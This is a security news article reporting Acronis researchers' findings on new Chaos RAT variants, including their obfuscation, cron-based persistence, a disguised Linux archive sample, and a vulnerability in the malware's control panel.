New variants with enhanced stealth, persistent access, and a critical vulnerability in its admin panel — marking a dangerous turn in open-source software misuse.
Security researchers at Acronis Threat Research Unit (TRU) have identified new and more sophisticated versions of Chaos RAT, a once-legitimate open-source remote administration tool that has now become a weapon in cybercriminal campaigns targeting both Windows and Linux systems. Originally released in 2022 as a Golang-based cross-platform management utility on GitHub, Chaos RAT was designed for legitimate remote administration. However, its ease of use, flexibility, and minimal detection footprint quickly drew the attention of threat actors.
The latest samples, discovered in 2025, show significant improvements, including enhanced system compatibility, better obfuscation techniques, and stealth features that allow it to operate undetected. Despite its limited deployment compared to mainstream malware, Chaos RAT’s ability to maintain persistent access and evade detection makes it an appealing tool for cybercriminals involved in espionage, data theft, and ransomware deployment.
Researchers also revealed a serious vulnerability in Chaos RAT’s web-based control panel. This flaw enables attackers to execute code remotely on servers running the panel, potentially letting them take control from other malicious actors. While this doesn’t directly harm victims’ devices, it raises red flags about the insecure design practices within some open-source tools.
In one recent sample submitted from India to VirusTotal, an archive file named NetworkAnalyzer.tar.gz carried the Chaos RAT payload. Though it’s unclear how the victim received the file, researchers believe it was disguised as a Linux network diagnostic tool, likely delivered via phishing emails or compromised websites.Early attack campaigns used techniques such as modifying system files and embedding cron jobs to ensure ongoing communication with attacker-controlled servers.
This allows the malware to be updated without needing to re-infect systems, a strategy also used in campaigns that previously deployed crypto miners. The latest variant encrypts configuration details like IP addresses and ports in a base64-encoded string, an upgrade from earlier versions that stored such data in plain text. This change makes analysis and reverse engineering significantly more challenging, highlighting Chaos RAT’s shift from an open-source utility to a sophisticated cyber threat.
